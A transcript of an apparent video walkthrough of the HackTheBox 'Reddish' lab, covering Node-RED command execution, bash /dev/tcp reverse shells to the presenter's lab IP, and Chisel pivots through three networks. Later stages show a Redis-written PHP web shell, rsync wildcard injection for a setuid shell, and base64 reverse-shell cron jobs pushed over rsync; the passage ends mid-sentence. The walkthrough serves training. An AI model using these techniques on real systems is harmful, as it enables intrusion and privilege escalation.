What's going on YouTube? This is IppSec. I'm doing Reddish from HackTheBox, and this box in particular forces you to understand networking pivots. We've pivoted before on previous boxes like I think a rec guy, but in those boxes we had SSH available to do SSH tunnels, and it was only one hop. In Reddish, I think we have like 3 hops to do, and SSH isn't available anywhere. But SSH not being available isn't really a hindrance at all. In fact, I don't really care for SSH when doing pivots because I normally use an application called Chisel, which is written in Go. And the main reason why I use that application is because it's written in Go, so it runs everywhere. If I want to pivot from Linux to Windows, from Linux to a phone to Windows to a phone, I can always do it because Go runs on almost any OS or hardware. So I just love this application for doing pivots, and I can't wait to show it all off. But before we do that, we have to get to the part where we can pivot, so let's just jump in. As always, we're going to start with the nmap, so nmap-sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Reddish, then the IP address, which is 10.10.10.94. This can take some time to run, so I've already run it. Looking at the results, we see out of the top 1,000 ports nmap scans by default, none are open. So the next thing to do is a full nmap scan, so we'll do nmap-p-, which is going to do every ports 1 through 65,535. I'm going to specify -T5 to make this an aggressive / fast scan. I'm going to do --max retries and set this down to 0. I'm going to specify -V so it shows me the open port as it runs. And then I'm going to do -OA to output all formats. We'll put in the nmap direct and call it all ports -Reddish. Then finally, the IP address, which is 10.10.10.94. While this runs, I'm just going to try to identify what OS this is. So I'm going to ping 10.10.10.94. And we see its TTL is 63, so this is most likely going to be Linux. If I ping a Windows box, which I'm going to do 40, because this is blue on HackTheBox, we see its TTL is 127. By default, Windows generally sets its TTL to 128 and Linux 63, and whenever ping goes through a layer 3 hop, it decrements by 1. So there is a router, and it didn't show any ports open. I'm going to do this again, and this may be why you'd rarely see me do -T5 and max retry 0, because if it misses the port, it comes back as empty. So if this fails again, then we'll make this not as aggressive. But anyways, as I was saying, every time ping goes through a router, it decrements the TTL by 1. So if I do a trace route on 10.10.10.94, we see the hop at 10.10.14.1. This is what decremented by 1, and there we go, the port's open. So that's why it says 63 instead of 64. So if I ping localhost, there's nothing between me and myself, so it doesn't decrement that TTL. So all we know is it's a Linux box and port 1880 is open. So I'm going to do another nmap. We'll do nmap-p 1880-sc-sv for default scripts and enumerate versions. OA output all formats, put in the nmap thing, call it targeted 1880-reddish, and then the IP address. And this shouldn't take too long to run because it's just a single port. I'm going to guess probably around 15 to 20 seconds. And now nmap has finished. It took 14.32 seconds, and the port is running a HTTP service, and it's the Node.js Express framework. So I'm going to go over to its IP address. So I'm going to copy this and specify port 1880, and we see the page just says cannot get /. I'm going to press Ctrl-U to view the source, and I don't see anything that enumerates what this application could be. And in most videos, you'll see me go straight to GoBuster, but I'm noticing something is leaking right here. We have an icon up in this top left of the site, so I'm going to do a request on favicon.ico because that's just where those icons are stored, and then I'm going to download this icon. And then I'm going to go to google.com/images. We're going to search by image, upload an image, browse, and I want to go to downloads favicon. It'll upload the file, and we see it is node-red. So I do a lot of digging on this application before I continue to kind of figure out what we're working with. But that's why I'm not going to worry about GoBuster, because I enumerated through a different way. So going back to 1880, it says cannot get slash, so I'm going to send this over to burp suite, make sure burp suite's on intercept, and instead of doing a get request, we're going to have burp do a post request. So I'm just going to change the request method and change it from get to post, forward this on, and we see some information. We have the path is red/ID, and the ID is here. So I'm going to turn intercept off, and I'm just going to get 10.10.10.94.1880/red/the ID, and we'll see what happens here. And it's loading the application, and this is it. So I don't know exactly what to call this. It's probably a type of programming language or something. If I went to Node-RED security and went to like about, I could find out what the application is. So let's see, what is it called? It's a flow-based programming tool. But we got a bunch of things we can do here, and we can probably run commands with exec. But if we do exec, how do we get output? So I'm going to paste exec, run this, and I'm just going to say, who am I? Click done and deploy. And I don't see anything for output or anything. So I'm going to leave this as just exec. And I'm going to look at what else we can do. We have TCP and TCP again. So this TCP, I'm going to say connect to port. We'll say, let's see. We'll say 8001. Actually, I'm going to do port quad 4s at 10.10.14.2. And then we're going to send the output. Let's see. This is listen. Let's see, is there a different? Okay. So I did the TCP input here. I want to do TCP output. And we can connect to, we can just set this to reply. And then drag an arrow here. Drag an arrow here. And then let's listen on. First, let's make sure we're 10.10.14.2. Am I not connected to the VPN? Oh no, ton 0. So I'm 10.10.14.3. So let's change this to be 10.10.14.3 and do netcat lvnp 4444. Click deploy. And we see we got a connection back. When I run commands, I'm only getting the standard error. If I put something that doesn't exist, it says bin.sh, that command is not found. So what I'm going to do is, if I read this, we scroll down, one of these should say like, this line is standard in, this line is standard error. Oh, there we go. If we highlight standard out, standard error, and return code. So I want to return everything. So if I do all three of those, and we listen, and click deploy, if I do ls, now I got a shell. I can do cd ... do ls. I'm still in the same directory, so we don't have a full shell, but we got a shell, and that is good enough for now. So what do we want to do with this? Probably run like a lin-enum script. So I'm going to copy opt, where is it? Do I have it as a capital L? Lin-enum, lin-enum.sh. And I like making a www directory. Let's move this into www. And then we'll do Python simple HTTP server. And go back over to a shell. Curl 10.10.14.3. Port 8000. lin-enum.sh. Curl not found. wget not found. So we're having troubles getting a script to this, but what we could do is do netcat -l v let's just do port 8000 and direct the contents of lin enum to it, and then go back into a shell. Do we have netcat nc? We do not. Let's try cat dev tcp 10.10.14.3 port 8000. Cannot open that. So let's look at what type of shell we are. So do ls-la on bin sh, and we'll see we're using dash. And if we used bash, chances are this would work. So let's do ls-la bin bash. Bash does exist, so I'm going to do bash-c, and then we can try cat dev tcp 10.10.14.3 port 8000. And it does show the script, so let's do that again. Let's do bash-c cat 10.10.14.3 port 8000. I forgot. Dev tcp 10.10.14.3 8000, and we'll pipe that to bash. I think that'll work. Run this, and it did not. Let's try this. Bash-c. I may just direct this to a file and manually run it. Start netcat, run, connected, and I'm not getting an output. So let's just save this to a file and make our lives easy. So bash-c, cat this, direct it to dev shm lin enum.sh. We have to start up netcat, paste, and then bash dev shm lin enum.sh, and it's not running at all. So let's try getting a real shell and seeing if that fixes it and getting out of this fake shell. So let's turn burp off. Let's do reverse shell cheat sheet, pen test monkey, and let's try this bash shell. So we want to do bash-c, and then 10.10.14.3. We'll do port 8002. That looks fine. Paste. nc lvnp 8002. Run this. And now we got a shell. So let's go to dev shm, and we can run bash lin enum.sh. And there we go, it's running. So we're actually getting the output now. Sometimes playing with all that is annoying, and it's just easy to get a shell. So while this runs, let's go to the top and start looking at it. So if we do lin enum, let's see what we see. We have the Linux kernel, which just says we're really on Ubuntu, and its compile date was in 2018. So may not worry about looking for like kernel vulnerabilities, since this is most likely up to date when the box was released. We got group memberships. We can look at users. We have the node user, and then everything looks default. Pass WD. Shadow file. It says we can read the shadow file. So my guess is we're just in Docker or something if we can read the shadow file and there's actually no passwords. So I'm going to guess Docker right off the bat. Going down, we got the home directory, bunch of files, and Looks like the command is still running. So while that runs, let's just look at ls-la on slash. And we do have the Docker env file. So that confirms that we are inside of Docker. And looks like Linux is telling us that as well. And I'm also going to run, let's do like IPADDR to get the address. And we see, what we don't see is 10.10.10.94, the IP address for Reddish. So all we see is 172.18.02 and 172.19.04. So I'm going to scan both of these subnets. So we'll do for IP, and actually, let's do it in a new window. Let's do vipscan.sh. And the reason I'm doing this is just to make it easier to read while we type it. So for IP in sequence, we'll do 1 to 5, do, and then we'll say ping-c 172.18.0 IP to dev null and echo online 172.18.0 IP. Done. So what this does, if we just ping, let's try to ping an IP that probably doesn't exist. There we go. That IP doesn't exist. So ping-c1, that IP, dev null, and echo online. So that ping command's going to receive 0 responses and then send a return code of error, and that means this and won't finish. Because that and means if the return code means it exited successfully, then continue. So that's all that is doing. So since this ping command exits with an error, this and doesn't happen, and it never goes to that echo online. So let's go back to the IP scan, put this on one line so it's easy to copy and paste. And then we will run it in our shell. Let's see, does it run? I don't have ping-c1. Forgot that. Copy, paste. And we can see 2 IPs are online, 1 and 2. 1 is probably going to be the gateway, and 2 is going to be the box itself. If I do IP ADDR, yep, 2 is the box itself. So let's go back and change this to 19, and change this to 19. Copy our ping command. And I do Control L to clear it so there's less junk on the screen. Paste. And we get 4 IPs online. 1, 2, 3, 4. Our box is 4, so we can guess that 2 and 3 are probably other containers, and 1 is going to be the gateway. So let's do a port scan on 2. So we're going to follow the same logic that we just did, but we're going to change it up a little bit. So let's do v port scan.sh. And the first thing we want to do is loop through a bunch of ports. So we can do 4 port and let's do like 22, 25, 80, 443, 80, 80, 8443. You could have also done something like sequence 1 to 65,535 if you want to do all ports. But I'm just going to do a handful of ports so we do this quickly. And then do echo port, done. And let's test this. So bash www port scan, and we have the output. So what we want to do is echo something, could be anything, into dev TCP 172.19.02. And then If that's successful, we want to echo open port. And we also don't want to have any like error messages. So what I'm going to do is we'll combine both of these into one command. And then direct errors to dev null. So if I cat port scan and we run this, hopefully it works. We didn't get any results on that IP, so let's just try another IP. Instead of 02, let's try 03. Copy this, paste it in, and it looks like it worked, but we have an error. It just says open port, so let's edit this, and instead of single quotes, double quotes, so it actually processes our variable. Paste. And we have on 172.19.03, port 80 is open. Now, if you didn't want to do bash, you could always go to like static build nmap GitHub and grab this static binary of nmap and copy it on. Let's see. Is this it? Binaries, Linux. I think it was a 64-bit. If we download nmap, save this, and go over here, move downloads nmap, and then nc 80 nmap. We have to do a listening port. We'll do lvnp, and then go back to dev shm, and then cat dev tcp 10.10.14.3 82 nmap. md5 sum nmap 99d md5 sum nmap 99d. So chmod plus x. And the reason why I was doing md5 sum to make sure it copied correctly, we do /nmap -p80 172.19.03 chmod -p80 172.19.03. Permission denied. Let's see. Is there like a no exec on dev shm? There is. So we see right here. And no execute. So let's just move nmap to temp. nmap -p80 172.19.03 /. One of these times I'll get the syntax correct. And unable to open. Maybe it just doesn't like being in Docker. Try this last one, and then we'll just move on. So you may want to statically compile it yourself. I'm running into issues there, but it's probably just easily fixed if you just Google these error messages. So we have to get to port 80 on 172.19.03, and we don't have SSH, so we can't do SSH tunnels. So what I do in this case is use a program called Chisel. So if we Google GitHub Chisel, and we want to download this, so let's clone and go into our Kali box, git clone Chisel and we can just do go build to build Chisel. And if we look at this, du-hs Chisel, it's a 10 megabyte binary. Well, we could shrink this down a little bit, and Go does support ldflags. So if we just specify go build -ldflags -s to remove, strip the binary of debug information, and -w to remove dwarf information, and then do a du-hs, it's now 7.5 megs. So we lost 2.5. We can also just UPX pack this, UPX root Chisel, and when this UPX finishes, it may be even smaller. So du-hs Chisel, and now we're down to 2.9 megs. So you can shrink Go binaries down a little bit by just doing things like that, and the binary still works. So let's move Chisel to dub, and we can say nc lvnp 80 Chisel, and we want to download it, so --c cat dev tcp 10.10.14.3.80, and say that is Chisel. Connection refused. I never hit enter. So let's run this again. And do an MD5 sum on it. Chisel, F60, MD5 sum on Chisel here, F60. So we got the same binary on both ends, and now we have to do a tunnel. And this can be a little bit difficult to understand, so I wrote some PowerPoints to show exactly how SSH tunneling and Chisel work. So let's jump over into the slides. Before we get in, if you're familiar with SSH tunnels, just keep in mind Chisel is everything reversed. In an SSH tunnel, if you do local with Chisel, you'd probably do a reverse. And that is because with SSH, you are the client and you're going through the firewall and talking to a SSH server. Use Chisel in situations where you can't talk over SSH and you have to say, hey, client, connect back to me, and then open up the tunnel. So with Chisel, we are the server and we're talking to the client and routing through it. So we're doing a reverse pivot first. And reverse just means the remote box is listening, and the remote box in this case is RBox. RBox here because we're running the commands on the client. So hopefully that makes sense. And if it doesn't, it'll make sense once we go through this. So the very first thing we do is on RBox, or on the server end, the Kali box, whatever, we say, hey, Chisel, we are the server. We want to listen on port 8000, and we also want to allow reverse connections. And then we go over to the client and say, Chisel, we are the client, connect to our box on port 8000. And with that, we want the remote box, which means our box here, to open up port 8001. And whenever we see a packet go in on 8001, we're going to direct it through that tunnel we created on port 8000 and send it out to 172.19.03.80. So that allows us to do a curl command to localhost 8001, and then we access the other end. So let's go and actually do that to see it work in practice, and hopefully it makes sense once you see it work. The first thing we have to do is stand up the Chisel server. So we do /chisel, say server-p 8000 -reverse to allow reverse connections, and then -v for verbose. And I like this just because oftentimes if I make a typo somewhere, the verbose flag tells me if they connected to me or did not. So now we go over to the client, which is Reddish, or the pwned box. So we'll do /temp Chisel client, then the IP address, which is 10.10.14.3, port 8000, and then we want to specify remote port 8001 and direct this to 172.19.03 on port 80. So when we run this, we can see it handshakes and it opened up the proxy. So if we go here and do a curl localhost 8001. I forgot the colon. We can see we get a web page back. Now, there's one thing I don't like about what I just did. And if we look at netstat ALNP on grep for 8001, we see it's listening on quad zeros, which means anyone on our network or that can get to our Kali box can access our tunnel. So I'm going to kill Chisel. So pkill-9 Chisel. And we can do temp Chisel client 10.10.14.3 port 8000, and then reverse specify 127.0.0.1 8001 172.19.03 80. So what this is going to do is tell our server to listen on localhost on port 8001. We see handshaking, it's open, and now if I do that netstat again, we're only listening on localhost, so it's a bit more secure. And if you're doing this, you should also look into like the dash fingerprint option, and when Chisel starts up, there is a fingerprint, and then you can paste that option in your client as well to make sure your client only connects to intended servers. But now with port 8001 open, we can look at what the connection is, and we see it's just the default it works page, but we have a few other things. So let's view what it looks like through a web browser. 10.10.10, we want localhost, then 8001. We don't see anything, but if you press Control-U to view source, you can see everything else. So we have a function get data, and it's getting this URL. So let's copy this, 10.10.10. I always say that, localhost 8001, and paste this in. And we get hits, it says 3. So number of hits, colon. So we're not seeing this, we're just getting the data response, but that's fine. So we have another function, increment counter. So let's copy this, localhost 8001, paste. It's not really doing anything. If we hit enter, we get 4. So it has moved up. The next function, let's see, share a web folder with the database container, done. And then add code to back up the databases. So if we try this, let's see if we can access files. Is it like a LFI? Localhost 8001. And let's back up Etsy past WD. And we don't get anything. But from this, it says there is a note that says the web folder and database container are shared. So let's see if we can access the database server. I'm going to guess that it is 172.19.02 because if we go back to our box and do IP address, we have this one link 172.19.04, and we found something on 3. We know 2 is active, but we didn't see any open ports. So what I'm going to do is let's open up another reverse shell. So nc lvnp, I'll say 7001. And let's do bash-c, bash-i, I think it was that dev tcp 10.10.14.3. Did I say 7001? I did. And then I think that's the syntax for the bash shell. Yep. So we have the shell. Let us go back into www and the port scan. We have, or I've already changed it actually to, instead of all the numbers, it's sequence 1 to 65,535. So when I paste this in, it will tell us when a port is open. And we have port 6379 open. And my apologies for not showing me editing this file. I noticed probably right after I ran this command that my screen recorder was still recording PowerPoint and I was just recording voice. So I had to redo a portion of that. Apologies for that, but that's the only change I made. So We have to now have Chisel connect back to us, so 10, 10, 14, 3, 8000, and we're doing a different reverse connection. We still want it to be on 127.0.0.1, but this time 6379, I believe. Yep, 6379. And then we direct that to 172.19.0.2, 6379. And I forgot the client feature, so copy this. Tell Chisel it is the client. Connect. We see session 3 handshake. We have open to proxy. So now if I do nmap-st to specify TCP scan, by default it's a SYN scan, and SYN scan does not work through proxies. So we'll do st-p6379-sc for enumerate or default scripts, sv enumerate versions, and then localhost. And I also want to say it goes in nmap, what should we call this? 172.19.0.2. So now we're doing the scan, and we'll see if nmap can identify what software this is. So it tells us it is Reddish. So I'm going to go over to Firefox and do Reddish remote command execution. Go to the packet storm security, and we have a bunch of things. So the first thing it's doing is saying, hey, telnet to us, and then echo no auth required. So let's try this. So nc 1010 nc localhost 6379 echo no auth is required, and it looks like that command goes through. The other thing I'm going to do is go back to this, and where ajax.php test is, let's do echo. Wrong number of arguments. So if we do help echo, or let's do just echo hey no auth is required, and we get it here. So this ajax.php thing looks like it's a direct connection into Redis itself. So if we had just enumerated based upon like messages, like if we did help, let's do about, just trying a bunch of commands, you may be able to enumerate it as Redis that way. So we have successfully found out that no auth is required. And then they do a bunch of things. This is small text and a lot of text. So I'm just going to do the commands I know. So let's do flush all. And then we can set please subscribe. This could be anything. To PHP code, because we know based upon that note on the page that there is the web server directory shared with the database server. So I'm going to try dropping a PHP script to see if it executes. So let's do that, then system request IppSec. So just a quick PHP shell. Unbalanced quotes. I don't have an end quote. So copy, paste, broken pipe. Flush all. Let's paste this in. Okay. So the next thing we need is to do a config set db file name. And we'll call this ipsec.php, config set dir var www html, and save. So we're writing a configuration file called ipsec.php to var www html. And then if I go over to this, localhost 8001, ipsec.php, we can see it exists. And if I give it the variable IppSec and do who am I, we can see we are www data. So we definitely have code execution here, so let's send this over into burp to make it a bit easier to work with. intercept on, send this to repeater tab. If we click go again, we see we are www data. So let's give ourselves a shell. So we'll do change this request method, and we want to do --c --i. What was it? This dev TCP. And before we do a shell, let's just see if we can talk to ourselves. So let's do --c, because I just realized if we do IPADDR, we have .19 and .20, and the previous container that we were on has 18 and 19. So what if only 18 can talk back to us and 19 cannot? So let's try ping-c1 10.10.14.3. Click go. And it doesn't look like we can connect to ourselves. So we have to do a different tunnel because this guy cannot talk to our machine, but he can talk to the web server. So we can do another port forward to listen on the web server and direct it back to us. So let's go into the syntax of doing that. So the local pivot is very much like the reverse pivot, except it just means the port is being opened up on the client, and that is normally your local box. So the very first thing we do is spin up a Chisel server on the server with Chisel server -p8000, and then we go over to the client and run Chisel client HTTP port 8000 to connect to the server, and then we specify 9001 and then localhost 8001. So what that's going to do is open up port 9001 on this guy, and then any box that sends anything to this is going to go through the tunnel and land on port 8001. What that allows us to do is send a reverse shell from somewhere on the network to 9001 and then receive it on our Kali box. The other way a lot of people use local pivots is to access like port 445 of a Windows box, and you just remove the 127.0.0.1 and put what IP address you wanted. So 10.1.3.37.445 would go through the tunnel and then access whatever box is at that. So that is the local pivot. So let's see it in action. On the client, let's run temp chisel client, if I could spell that correctly, then 10.10.14.3, port 8000, and we want to forward 9001 to 127.0.0.1, 8001. Set this. We see it verified the connection, and now it's open. So let's go here and listen on port 8001. It's already in use. Netstat ALNP grep 8001. I'm using it for something. Crap. Let's change this. The downside when doing a lot of port forwards is sometimes you reuse ports. So let's listen on port 9002 and send it to 127.0.0.1 8005. I know that's not in use. Okay. Now we can do netstat. We don't see anything listening on port 8005. So we can do nc lvnp 8005. Okay. So let's go back into burp. And we see a 404 not found on our script. So it looks like there's something that cleans it up. So let's just save this again. Click go. So now we see our script is back there. So we can do --c --i this, then dev tcp 172.19.0 what is the web server's IP? 04. Then port, we said 9002, I think. And then I think that's the syntax. Let's URL encode it. Click go. Not found. That's annoying. Save. Go. We're not getting a response back. If we go to a netcat, now we have a shell on the database server. So let us do ls-la on /, and we see a backup directory, and that's normally not in use. So let's do cd/backup. When we look at this, we got backup.sh. And if you cat this file, we see it cds into this directory, does a RSYNC, and we got a wildcard here. So let us check if there's any like vulnerabilities in RSYNC. So I'm going to do the GTFOBins. And again, this is just like lolbins on Windows. Let's turn burp off. GTFOBins. And then type rsync. And we see we have a way to get a shell. So that -e flag in rsync allows us to, looks like it executes code. So if we have a file and the file's name is -e and ends with .rdb, we can inject commands into this. So let's see that in action. First, it is going into this directory. Actually, we have to find out if this script is being used. So let's do dev shm, and let's just get that lin-enum.sh, because I think we have to open up another tunnel to do that. So let's go here, and we want to do a local forward. So let's do temp chisel client. We'll do 9003, 127.0.0.1, 8006. We see the session is open. So should be safe to get rid out of this shell. And we can name this db docker. So cd dub python-m simple http server port 8005 is what I thought we listened on. 8006. And then we can cat dev tcp 172.19.0.4 port 9003. And normally when you do tunnels, I like keeping the port consecutive on both ends of the tunnel, but for this video, to show you exactly, like, if I put like 8006:8006, you wouldn't know which end is which. So that's why I have them different here. Normally, I keep them all the same. So save this file. And I forgot to list. Oh, I didn't want that. I wanted nc lvnp 8006. Because we probably don't have curl netcat or whatever. So I don't want a HTTP request. Paste this. Cat lin-enum.sh. We can see we got the script. And we can execute the script. So go to the top. Let's see. Here we go. So just like the last one, we see we're in a Ubuntu container, same kernel. Our host name's dub. Before, it was root, I believe. Etsy passwd, root's the super user account. Some of these things won't work just because it doesn't have the binary it's expecting, because it's a stripped down container. Got a bunch of hidden files. Some user files. world readable files in home. It's going down, and we have a file called backup inside of etc-cron-d, and we can read it. So if we looked at this, if we go to etc-cron.d, backup, it's just executing that backup script every 3 minutes. So now we know for sure if we edit this script, or not edit the script, abuse this RSYNC, it will get ran. So let us do that. So we want to go into var dub HTML, and then we have to create a file name. So we do touch dash dash. Actually, to make this easier, let's not do a touch just yet and create a file, because we have to run a few commands and it gets nasty chaining commands and a command line. So let us create the file on our box, because we don't have like VI or nano probably. So let us do VI on please subscribe.rdb. And the file just has to end in RDB because, again, in order to match this stir.rdb, if that makes sense. Hopefully it does. So bin bash, we'll do bin sh, and then we can do cp bin dash, and then chmod 4755. We're going to copy that to temp privesc, and then temp privesc. Unlike the bash shell, the dash shell does not drop set UID. So if we just copy dash and then give it the ability to do set UID, it will allow us to privesc. So in order to get this file over to the box, let's base64, please subscribe. We can specify dash width 0 to put it all on one line. And we can copy this. I don't know why this window just popped up. And then go back to the shell. And we can say echo this, base64-d to temp please subscribe.rdb. I think that's the file path. Is it RDB? Backup. RDB. Yep. So ls-la/temp. And we have please subscribe.rdb. If we cat this, /temp, it's just going to move dash to privesc and then chmod. So let's just make sure bin dash exists. It does. So this should work. So now let's just clear a bunch. Cat backup.s, was it /backup. So now we just have to put a file in this directory. So touch, and then specify this, and then the GTFOBins said use the -e to execute commands. So I'm just doing -e, and then this should all be in quotes, because spaces will be seen as terminators if they're not. Okay. So we want -e, sh. Oh, I don't know if I can do slashes in a file name. Probably not. So we'll move the please subscribe file right after we run this. So we do ls on that F18 directory. We have that as a file. Let's move that into the F18 directory. And probably have to create this again. That's where the file's gone. let's see. There we go. So now we got the file and this. And just make sure that didn't execute. If we do ls on temp, it's empty. So it is currently the 33rd minute. So in about 2 minutes, this will execute. It will do, let's see, RSYNC-A. And then because this stir.rdb, it will actually pick up this file name. So it'll do -e sh please subscribe.rdb, and then this. So this will be the entire command it is running, and because it's got this -e, it should execute this. I'm not sure if I have to put this in quotes. That's the only thing I don't know. That if it fails, I probably forgot to put this in quotes. So let's see. Does this have it? This does use it in quotes, so let's do that. Touch -e sh. And then this. So we do lsla on that directory again. And now I got one with quotes. So this should work. If we look at date, we got another minute left. So I'm just going to fast forward the video and not make you wait. So it's been the minute. We look at date. And let's look at this directory. We see it cleared it out. So the cron definitely ran. If we look at temp, we do have privesc. We do ls-la on temp. It does have that setuid bit. So let's try executing it. So temp privesc and do ID. Our effective ID is now root. And if we exit this, did ID before, we don't have that. So now with root permission, we should be able to go into /root. And it doesn't really buy us anything. The only thing it bought us is the ability to go into these home directories. I think it's Samaro. And we can now read user.txt. So we do that. We can see it's 33 characters. I don't think the burger guy has anything in it. Nope. So having root on this container doesn't really help us at all. I'm just going to exit out of that. Because if we go back to that backup script, we shouldn't have asked ourselves the question, where is the password? That's the question we should be asking ourselves. Because it's doing this rsync, going to backup. We cat etc hosts. We probably don't know where backup is. I'm going to guess it's going to be 172.20.02. Can we ping -c1 backup? Cannot open ICMP socket. Ping -c1 backup. Okay. So we can see, yes, it is 172.20.02. So I guess being root allowed us to see that. But we could have made that guess just based upon how the networking was done before. So let's look at backup.sh. And it's not doing any type of password on this rsync thing. So let's try going into temp, rsync-a, specify rsync : / backup. And let's try like etc shadow outside of this directory. And can we copy this? No such file or directory exists. Let's see. rsync-a. Oh, I don't have a colon. I think that was it. And we didn't get an error message there. If we cat shadow, well, now we have access to file with root permissions on the backup server. So let's try RSYNC backup. Instead of that, let's try root.txt, and the file does not exist. So we have to find a way to get code execution on this, and the easiest way is just by pushing a CronJob. So let us do that. Before we can really push a CronJob, we have to remember that the backup server probably can't get to us because we have our CaliBox, which is on the 10.10.14.0. Then you got Node-RED, which is 172.18 and 172.19. Then you got the www server that is on 172.19 and 172.20. And then the backup server, which probably is on 172.20, and who knows, if it's following the scheme, it's 172.21.00 and there's another hop or something weird. But let's see. But because the backup server probably can't talk to Node-RED, we have to set up a chain of tunnels. So we're going to go from Cali to Node-RED to www to backup. And we want backup to be able to talk directly to our CaliBox. So to do that, our Cali is going to be listening on 8000. And then Node-RED, we're going to say everything that comes into port 8010, direct that to 8000. So Node-RED is acting as a proxy to the server of Chisel. And then on www, we can say connect to Node-RED on port 810, and then forwards port 8020 to 127.0.0.1 9005. So then on the www server, port 8020 will be going back to a CaliBox and listening on port 9005. So that is the hope, that we can set up all those tunnels easily. So let's begin doing that. So let's go back here, temp Chisel, and then we need client, then 10.10.14.3, port 8000, and we said the very first hop is 8010. So 8010, 127.0.0.1, port 8000. So now we have that connection open. So temp Chisel client 10.10.14.3, 8000, and I'm also going to open 8011, and this one is going to, we'll say 9004, if this port is still open on my box. Looks good. And the reason why I did 9004 is because we have to get Chisel over to www. So nclvnp 9004 Chisel. Go here, and we can say cat bash-c cat. I don't need bash-c, I'm in bash. Just in case I'm not in bash. Cat dev tcp 172.19.04. That is the IP address of Node-RED. And Node-RED, we said, was listening on port 8011. And that goes to Chisel. Looking here, we have a connection. We can MD5 some Chisel and MD5 some Chisel, F60, F60. So now we got Chisel on www. So let's go back to our notes. And we want to have Chisel connect to Node-RED. So first, let's make sure Chisel is executable. It is. So we can do temp Chisel. Then, and if it wasn't executable, that's where we just chmod 755 Chisel. But temp Chisel, client then 172.19.04, port 8010, and that is going to connect to node red, which forwards us to 8000 of our Kali, and we wanted to say open up port 8020 to 9005. If we look, we have that connection open. So now if anything talks to the www server on port 8010, it goes to a Kali box on port 9005. The issue right now we're having is the I didn't put an AND at the end of this, so I don't have a terminal on www anymore. So we have to send another one. So let's do that. NC LVNP 9006, and we go back to this temp Chisel client 10.10.14.3 8000, and let's forward port 8012 to 127.0.0.1 9006. So that's now open. If we go back to burp, we should be able to change this to 9006. Probably have to save the config again. Click go. And did not work. That's listening on 9005. NCLVNP 9006. It's listening somewhere. Okay, I'm listening there. Why did that not work? Oh, I'm listening on port 8012. There we go. So go over here, and we have the shell. So now we have to create a cron job so we can sync it up to the backup server. So let's do echo 1, 2, 3, 4, 5 root --c --i, and then dev tcp just going to echo that so I can do IPADDR to get the IP. And we probably want 172.20.03. .20.03, and we said it's on port let's see, 8020. I screwed up my standard in, so 172.20.03, port 8020, and then double single to run me. So if we cat run me, we got it there. So let's cat that backup script to get the RSYNC syntax. So we're going to do RSYNC-A, send run me to rsync backup 873 src etc cron.d, and then run me. Looks good. And we can sleep 60, and within 60 seconds we should be getting a shell. So just looking at this, 20.03, 80.20. Oh, shoot. Where is this echo? I forgot something. That's what I need. And then rsync. And we can always test this command. So it does work. So we're just waiting for the server to execute this. Still nothing. It should have happened. So let's see. Where could I have screwed up? Let's cat run me. And let's see. That looks fine. Unless the database server doesn't see 172.20.03. But if we do ping C, or not database, backup. One. Yeah, it should see 172.20.03. Something is wrong with the cron. Let's see. Where is my echo? Let's cat run me. Let's echo. This. Can I do quotes that way? Yes, I can. So try this. To run me. That may be a bit better. So we can try RSYNCing this. So copy this. Paste this in. And see if we get a shell. And we still don't have a shell. So what I'm going to do is we'll go back to this Docker container. I'm going to do RSYNC -A to preserve permissions. A, I think, will do a directory, and V is verbose. RSYNC backup 873 source etc cron.d, and we'll specify a working directory. And doesn't look like that worked. So what did I screw up? RSYNC. Let's just specify -AA. RSYNC backup 873 source etc cron.d. Make dir cron. Maybe it doesn't like that period. And copy it into the cron folder. Nope. Let's see. Can we copy source etc cron.d run me? Something's wrong. Cat /backup backup.sh rsync-a. Maybe it doesn't like that capital A. I thought that was preserve permissions. We'll try just AV. Let's see. Failed exec SSH. Oh, I don't have rs. There we go. Okay, so it doesn't like capital A. And there should be Oh, I copied run me. Cat run me. That's what we expected. So let's try rsync-apv. What I'm trying to do is get the permissions of the file I'm copying. Source etc cron.d. There we go. It's all owned by me. I wonder if that's just because I can't do it. Let's see. Cat run me. So let's try something real quick. Let's do privesc. Okay. And then let's ch own or copy run me to shell ch own shell ch own root shell. There we go. And we also want ch own us as the group. Okay. Now let's try rsync-apv shell to rsync backup 873 source etc cron.d shell. That copied it over. Sleep 60 seconds and hope we get this one to run. It's been 60 seconds and still don't have a shell. This is getting rather annoying. So let's move shell to etc cron.d. Look at date. And 25 seconds, we should get a shell back. So now I'm just testing on my local box. Or not my local box, on this box. Maybe it's just the database isn't executing. And then the next step is we saw cron.d had a clean. So I'll just overwrite clean next. But right now I don't know if I'm doing this syntax correctly. So that's what we're testing now. It's been a new minute, and we don't have a shell. So it must be the syntax we are doing, because if we just executed this, we have to copy the --c. If we just executed this, we get a shell. So we have to do something different because it doesn't like how we're passing the shell. It's probably got too many like special characters. So a way around that is to use base 64. So let's do that. So the first thing to do is echo this. And we can do this in a single quote. And then pipe that to base 64. Get the syntax. And then we can do echo 1, 2, 3, 4, 5 root. Then let's do this from the root shell just so we have it created as root in case it's like NFS and passes the username and all that stuff for permissions. Because I want the end file to be owned by root. So I'm starting this as root just because it may do that. I don't know. Echo 1, 2, 3, 4, 5 root. And then we want echo the base 64, decode it, and then execute with bash. Okay. And this will be, we'll call this clean, and we're going to overwrite clean. So if we cat clean, we have root, then echo all that, base 64-d, that looks good. So let's rsync-avp to preserve permissions. Rsync backup 873 source etc cron.d. And I need this file name first. Clean rsync backup 873 source etc cron.d clean. We sent that file over. So date, in 1 minute we should get a shell callback if this works. So sleep 60 and we'll hope. And there we go. We finally have a shell on backup as root. So if we go into the root directory, we still don't see the root.txt. Do IPADDR, we see only one network interface. So to get lin enum over to this box, we have to go back to our Docker container and we'll have to forward another port. So the last time we forwarded a port, we just did this. So we can paste the command in, and then we can say listen on 8021 and forward to 127.0.0.1. I think 9006 is open. Let's just make sure it is. So let's do nclvnp 9006. Yes, we have that open, so we can start this port forward. It connected, and then go into www, and then netcat lvnp 9006, copy over lin enum, go into temp, and then just download this. So we'll do cat dev tcp 172 was it 2003 slash, what port did we say? 8021, and I read that just here. And we direct that to lin enum.sh. And that does not look like it worked. It would help if I hit enter there. Paste it in. We see it connected. And we have the file. So let's run this and hope this is the last time we have to do this. So let's go to the top and let's just search for this. So bash lin, go to the top and we'll go down. We can ignore the kernel. We got the host name. We're running as root. Pass WD, shadow, root's home directory, cron, processes. Whoops, don't mean to copy. Where was it? I think this is where we were. Let's see. Okay, all I'm doing is searching for the bracket dash bracket, and this lets me hop whole contents. So I don't want super user, we don't need root. Files owned by our user, I don't care. Hidden files, maybe come back to that. Home directories, no. Environment information, not too interesting. Shells, 